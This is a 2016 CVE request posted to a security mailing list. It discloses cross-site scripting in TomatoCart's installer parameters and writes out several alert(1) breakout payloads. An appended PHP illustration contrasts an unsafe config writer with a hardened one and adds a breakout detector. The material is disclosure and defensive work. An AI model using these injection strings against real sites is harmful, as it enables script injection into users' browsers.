Date: Thu, 24 Nov 2016 15:25:10 +0800
From: haojun hou <>
Subject: CVE request - TomatoCart Multiple Cross-Site Scripting

TomatoCart - Multiple Cross-Site Scripting (XSS) 

Product: TomatoCart

Vendor: TomatoCart

Vulnerable Version: and probably prior

Tested Version:

Author: Haojun Hou in ADLab of Venustech


Advisory Details:

Haojun Hou in ADLab of Venustech discovered Multiple Cross-Site Scripting (XSS) in TomatoCart, which can be exploited to add, modify or delete information in the application's database and gain complete control over the application.


The vulnerability exists due to insufficient filtration of user-supplied data in multiple HTTP POST parameters passed to the "TomatoCart-v1-released-v1." url. An attacker could execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

The exploitation examples below use the "alert()" JavaScript function to show a pop-up message box:

DB_DATABASE=  <>"?>";</script><script>alert(1);</script><script>"<?php"

DB_SERVER_PASSWORD= "?>";</script><script>alert(1);</script><script>"<?php"

DB_TABLE_PREFIX= "?>";</script><script>alert(1);</script><script>"<?php"

DB_DATABASE_CLASS= "?>";</script><script>alert(1);</script><script>"<?php"

DB_SERVER_USERNAME= "?>";</script><script>alert(1);</script><script>"<?php"

DB_SERVER= "?>";</script><script>alert(1);</script><script>"<?php"

Could you please help me assign a CVE for this issue?
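Added illustration, not part of the advisory and not TomatoCart's own code: the post does not show the installer source, so the writer below is an assumed, simplified form of the weak pattern (raw POST values interpolated into generated PHP source, which is why a value containing `"?>` escapes both the string and the PHP block) beside a hardened form that allowlists the parameter names from the advisory and serialises each value with var_export(). The check uses token_get_all() to tell whether a generated file ever leaves PHP mode; all function names are hypothetical.

```php
<?php
// Constructed input shaped like the advisory's payload. The value closes the
// PHP string and the PHP block, so whatever follows is emitted as raw HTML.
$submitted = [
    'DB_SERVER'   => 'localhost',
    'DB_DATABASE' => '"?>";</script><script>alert(1);</script><script>"<?php"',
];

// Weak pattern (assumed, for contrast): the raw value is pasted between
// double quotes in PHP source. Nothing stops it from containing `"?>`.
function build_config_unsafe(array $values): string {
    $out = "<?php\n";
    foreach ($values as $name => $value) {
        $out .= "define('" . $name . "', \"" . $value . "\");\n";
    }
    return $out;
}

// Hardened pattern: only the expected keys are written, and every value is
// turned into a correctly quoted PHP literal by var_export(), so quotes,
// backslashes and `?>` sequences stay inside the string token.
function build_config_safe(array $values): string {
    $allowed = ['DB_SERVER', 'DB_SERVER_USERNAME', 'DB_SERVER_PASSWORD',
                'DB_DATABASE', 'DB_DATABASE_CLASS', 'DB_TABLE_PREFIX'];
    $out = "<?php\n";
    foreach ($allowed as $name) {
        if (!array_key_exists($name, $values)) {
            continue;
        }
        $literal = var_export((string) $values[$name], true);
        $out .= "define(" . var_export($name, true) . ", " . $literal . ");\n";
    }
    return $out;
}

// Detection check for generated config files: a config file should be one
// PHP block, so any close tag or inline-HTML token means user data broke out.
function leaves_php_block(string $src): bool {
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && in_array($tok[0], [T_CLOSE_TAG, T_INLINE_HTML], true)) {
            return true;
        }
    }
    return false;
}

var_dump(leaves_php_block(build_config_unsafe($submitted)));
var_dump(leaves_php_block(build_config_safe($submitted)));
```

The same token check can be run over an existing config.php written by an installer to confirm it contains no breakout.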
